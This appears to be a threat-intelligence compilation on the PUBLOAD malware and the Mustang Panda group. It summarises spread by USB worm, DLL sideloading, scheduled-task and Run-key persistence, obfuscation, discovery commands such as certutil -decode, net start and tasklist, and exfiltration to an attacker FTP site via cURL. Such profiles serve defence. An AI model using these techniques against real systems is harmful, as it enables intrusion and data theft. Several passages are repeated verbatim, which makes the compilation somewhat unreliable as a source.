PUBLOAD

Mustang Panda notably utilized the USBFect worm to propagate PUBLOAD via infected USB drives, enabling lateral movement and data exfiltration.

Mustang Panda, also called Camaro Dragon, Earth Preta, and Stately Taurus, is believed to have targeted entities in Myanmar, the Philippines, Japan and Singapore, targeting them with phishing emails designed to deliver two malware packages.

Typical attack chains involve the use of spear-phishing emails to drop malware families like PUBLOAD or TONESHELL.

"Pubload Backdoor Delivered via Phishing Lures"

“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”

During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.

facilitate two active reverse shells in parallel... Yokai, a backdoor that sets up a reverse shell to execute arbitrary commands.

During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.

"BOOKWORM ... execution on the heap is initiated through callback function of legitimate API functions such as EnumChildWindows or EnumSystemLanguageGroupsA"; "CLAIMLOADER ... run its shellcode through the callback function"; "PUBLOAD stager leveraged Windows API functions with callback ... to bypass anti-virus monitoring"

"...a malicious archive with a document-spoofing executable, which launches the Claimloader DLL..."

This sophisticated malware utilizes Dynamic Link Library (DLL) sideloading techniques to execute malicious payloads... In a notable instance, the malware exploited a legitimate executable signed by an automation organization to load a malicious payload identified as BrMod104.dll.

“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”

During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.

The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.

“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”

During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.

The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.

The content repeatedly describes malware and threat actors using obfuscated code, encrypted strings, Base64/XOR/RC4/AES encoding, VMProtect/ConfuserEx/SmartAssembly, stack strings, control-flow flattening, opaque predicates, and hidden payloads to evade analysis and detection.

During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.

Akira has used legitimate names and locations for files to evade defenses.

The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'

The malware copies its components to a working directory... These components include: A legitimate parent process ClaimLoader itself

This sophisticated malware utilizes Dynamic Link Library (DLL) sideloading techniques to execute malicious payloads... In a notable instance, the malware exploited a legitimate executable signed by an automation organization to load a malicious payload identified as BrMod104.dll.

The content repeatedly describes threat actors and malware using valid, stolen, forged, self-signed, or abused code-signing certificates to sign malware and appear legitimate, including examples such as AppleJeus using a valid digital signature from Sectigo, APT41 leveraging code-signing certificates, FIN7 signing Carbanak payloads, and SUNBURST being digitally signed by SolarWinds.

"actors used the following command ... to obtain information about services: net start"; "APT1 used the commands net start and tasklist to get a listing of the services on the system"; "OilRig has used sc query on a victim to gather information about services"; "Indrik Spider has used the win32_service WMI class to retrieve a list of services"

The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.

The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."

"Bazar can query the Registry for installed applications." / "BRONZE BUTLER has used tools to enumerate software installed on an infected host." / "LightSpy ... enumerate the Applications folder to collect the bundle name, bundle identifier, and version information..." / "Volt Typhoon has queried the Registry on compromised systems for information on installed software."

Multiple malware families (e.g., Avaddon, Bazar, Clop, Ryuk, REvil, LockBit, Zeus Panda) check OS language/keyboard layout/locale and terminate or alter execution if the system matches excluded languages (commonly Russian/CIS) or does not match desired target languages (e.g., Spanish/Portuguese, Arabic, Persian).

Mustang Panda notably utilized the USBFect worm to propagate PUBLOAD via infected USB drives, enabling lateral movement and data exfiltration.

USBfect is a worm that spreads via removable media, often used to propagate PUBLOAD for lateral movement.

PUBLOAD is equipped with features to conduct reconnaissance of the infected network and harvest files of interest (.doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx) ... PlugX then takes care of deploying another bespoke file collector called FILESAC that can collect the victim's files.

The captured information is compressed into an RAR archive and exfiltrated to an attacker-controlled FTP site via cURL.

Variants of PUBLOAD use either HTTP or TCP for command-and-control (C2) communications. The sample we observed is a variant that uses TCP... Masol RAT... communicates with its C2 servers over HTTP POST... This malware uses Google Remote Procedure Call (gRPC) for C2 communication.

This payload is part of the PubLoad malware family, which functions as stager malware that communicates with its command-and-control (C2) server for further instructions. The C2 communication is facilitated through HTTP requests that attempt to masquerade as legitimate traffic associated with Microsoft Windows updates.

its primary responsibility is to download next-stage payloads on the infected host... PUBLOAD... is also capable of downloading shellcode payloads via HTTP POST requests from a command-and-control (C2) server.

PUBLOAD collected and exfiltrated critical system information... over TCP with obfuscated TLS-like headers

The captured information is compressed into an RAR archive and exfiltrated to an attacker-controlled FTP site via cURL. Alternatively, Mustang Panda has also been observed deploying a custom program named PTSOCKET that can transfer files in multi-thread mode.